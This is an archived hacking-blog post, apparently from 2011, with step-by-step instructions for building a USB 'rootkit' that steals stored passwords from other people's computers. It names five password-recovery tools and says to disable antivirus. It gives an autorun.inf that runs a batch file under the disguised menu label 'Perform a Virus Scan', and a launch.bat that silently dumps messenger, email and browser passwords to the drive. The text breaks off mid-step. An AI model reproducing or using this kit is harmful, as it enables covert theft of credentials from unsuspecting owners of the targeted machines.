tag:blogger.com,1999:blog-46227889981668635212024-03-19T23:47:53.253-07:00Lost Hacker"Mess with Best, Die Like Rest"deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.comBlogger34125tag:blogger.com,1999:blog-4622788998166863521.post-25377135411804489772011-07-29T09:46:00.000-07:002011-07-29T09:46:09.375-07:00How to sniff Passwords using USB Drive<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 18px;"><span class="Apple-style-span" style="color: yellow;"></span></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">Anyone can steal stored passwords from any computer and that too by using your USB drive.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">Can’t believe!</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">Read on..</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.nirsoft.net/utils/mspass.html" rel="nofollow" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">MessenPass</a>: </strong>Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.nirsoft.net/utils/mailpv.html" rel="nofollow" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Mail PassView</a>: </strong>Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.<br />
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.nirsoft.net/utils/internet_explorer_password.html" rel="nofollow" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">IE Passview</a>: </strong>IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.nirsoft.net/utils/pspv.html" rel="nofollow" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Protected Storage PassView</a>: </strong>Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><a href="http://www.nirsoft.net/utils/passwordfox.html" rel="nofollow" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">PasswordFox</a>: </strong>PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.</span></div><span class="Apple-style-span" style="color: yellow;"><ins style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-style: initial; border-top-style: none; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_2_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_2" marginheight="0" marginwidth="0" name="aswift_2" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">Here is a step by step procedre to create the password hacking toolkit.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">NOTE: You must temporarily disable your antivirus before following these steps.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">1.</strong> <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Download </strong>all the 5 tools, extract them and copy only the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">executables(.exe files)</strong> into your USB Pendrive.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">ie: Copy the files – <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">mspass.exe</strong>, <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">mailpv.exe</strong>, <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">iepv.exe</strong>, <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">pspv.exe</strong> and <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">passwordfox.exe</strong> into your USB Drive.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">2.</strong> <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Create a new Notepad</strong> and write the following text into it</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">[autorun]<br />
open=launch.bat<br />
ACTION= Perform a Virus Scan</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">save</strong> the Notepad and <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">rename it</strong> from</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">New Text Document.txt</strong> to <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">autorun.inf</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">Now<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> copy </strong>the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">autorun.inf </strong>file onto your USB pendrive.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">3.</strong> Create another Notepad and write the following text onto it.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">start mspass.exe /stext mspass.txt</strong><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">start mailpv.exe /stext mailpv.txt</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">start iepv.exe /stext iepv.txt</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">start pspv.exe /stext pspv.txt</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">start passwordfox.exe /stext passwordfox.txt</strong></div></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">save the Notepad and rename it from</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">New Text Document.txt</strong> to <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">launch.bat</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Copy </strong>the<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 